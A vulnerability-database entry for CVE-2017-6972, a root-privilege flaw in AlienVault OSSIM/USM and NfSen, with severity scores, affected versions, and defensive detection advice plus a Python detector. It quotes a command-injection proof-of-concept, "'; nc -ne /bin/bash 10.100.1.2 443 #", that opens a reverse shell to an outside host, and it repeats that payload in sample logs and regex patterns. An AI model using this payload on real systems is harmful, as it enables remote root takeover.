cbcvebase.
CVE-2017-6972
published 2017-03-22


Priority: P266 (critical)
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 14.60% (96.2th percentile)
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka AlienVault ID ENG-104945, a different vulnerability than CVE-2017-6970 and CVE-2017-6971.

Affected (3 ranges)

Vendor      Product                       Version range   Fixed in
alienvault  ossim                         <= 5.3.6
alienvault  unified_security_management   <= 5.3.6
nfsen       nfsen                         <= 1.3.7

Detection & IOCs (extracted from sources)

Command (PoC payload): '; nc -ne /bin/bash 10.100.1.2 443 #
  • Monitor HTTP requests to the NfSen/AlienVault netflow processing web page for the 'customfmt' parameter containing shell metacharacters (e.g., single quotes, semicolons, pipe characters) indicative of command injection attempts.
  • Detect injection payloads in the 'Custom output format' input field containing shell command sequences such as `'; <command> #` patterns.
  • Alert on outbound netcat (nc) connections spawned by the NfSen Perl process or web server process, especially reverse shell patterns (nc -ne /bin/bash).
  • Detect NfSen Perl processes running as root, as the vulnerability involves unnecessary privilege retention (failure to drop root) during NfSen Perl code execution.
  • Correlate use of a stolen PHP Session ID with subsequent crafted requests to the netflow processing endpoint as a potential indicator of pre-authentication exploitation.
  • The exploit affects NfSen versions 1.3.6p1, 1.3.7, and 1.3.7-1~bpo80+1_all; previous versions are also likely vulnerable. CVE-2017-6972 is distinct from CVE-2017-6970 and CVE-2017-6971 but is chained with CVE-2017-7175 (the injection vector) to achieve remote root code execution.
  • The reverse shell PoC uses nc; if nc is not present on the target, alternative payloads may still exploit the same injection point, so detection should not rely solely on nc-based signatures.
  • AlienVault USM/OSSIM versions affected are below 4.3.1 per the exploit, but the NVD advisory states the fix is in version 5.3.7; defenders should verify the exact version boundary for their deployment.
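The detection bullets above turned into runnable checks, as an added example that is not part of this record or of NfSen/AlienVault: it flags a customfmt parameter carrying shell metacharacters, the '; <cmd> # quote-break shape, or an nc reverse-shell pattern, and flags NfSen Perl processes running as root. The access-log line format, the /nfsen/nfsen.php endpoint path and the process-event shape are assumptions; the sample data is constructed around the PoC payload quoted on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that have no place in an NfSen output-format string.
SHELL_META = re.compile(r"[;'|`&$<>]")
# The "close the quote, run a command, comment out the rest" shape: '; <cmd> #
INJECT_SHAPE = re.compile(r"'\s*;.+#")
# netcat with -e in any flag cluster handing the socket to a shell (nc -ne /bin/bash).
NC_REVERSE = re.compile(r"\bnc\b.*\s-\w*e\s+/bin/(?:ba)?sh\b")

def check_customfmt(value):
    """Findings for one percent-decoded customfmt value; [] means nothing suspicious."""
    findings = []
    if SHELL_META.search(value):
        findings.append("shell metacharacters in customfmt")
    if INJECT_SHAPE.search(value):
        findings.append("quote-break injection shape in customfmt")
    if NC_REVERSE.search(value):
        findings.append("nc reverse-shell pattern in customfmt")
    return findings

def check_request(line):
    """Findings for one access-log line in the assumed form '<client> <method> <path?query> <status>'."""
    parts = line.split()
    if len(parts) < 3:
        return []
    query = parse_qs(urlsplit(parts[2]).query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in query.get("customfmt", []):
        findings.extend(check_customfmt(value))
    return findings

def check_process(user, cmdline):
    """Findings for one process event (effective user + command line), e.g. from auditd."""
    findings = []
    if user == "root" and "perl" in cmdline and "nfsen" in cmdline.lower():
        findings.append("NfSen Perl code running as root (privileges not dropped)")
    if NC_REVERSE.search(cmdline):
        findings.append("nc reverse shell spawned")
    return findings

# Constructed samples (endpoint path assumed); request 2 carries the page's PoC payload, percent-encoded.
SAMPLE_LOG = [
    "10.0.0.5 GET /nfsen/nfsen.php?tab=2&customfmt=%25ts%20%25sa%20%25da 200",
    "10.0.0.9 GET /nfsen/nfsen.php?tab=2&customfmt=%27%3B%20nc%20-ne%20%2Fbin%2Fbash%2010.100.1.2%20443%20%23 200",
]
SAMPLE_PROCS = [
    ("www-data", "/usr/bin/perl /var/www/nfsen/bin/nfsend"),
    ("root", "nc -ne /bin/bash 10.100.1.2 443"),
]
```

Feed check_request every request to the netflow processing page and check_process every process-creation event; a non-empty return is an alert, and the second note above is why the first two customfmt checks matter more than the nc signature.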

CVSS provenance

NVD, CVSS v3.0: 9.8 CRITICAL, vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 10.0 CRITICAL, vector AV:N/AC:L/Au:N/C:C/I:C/A:C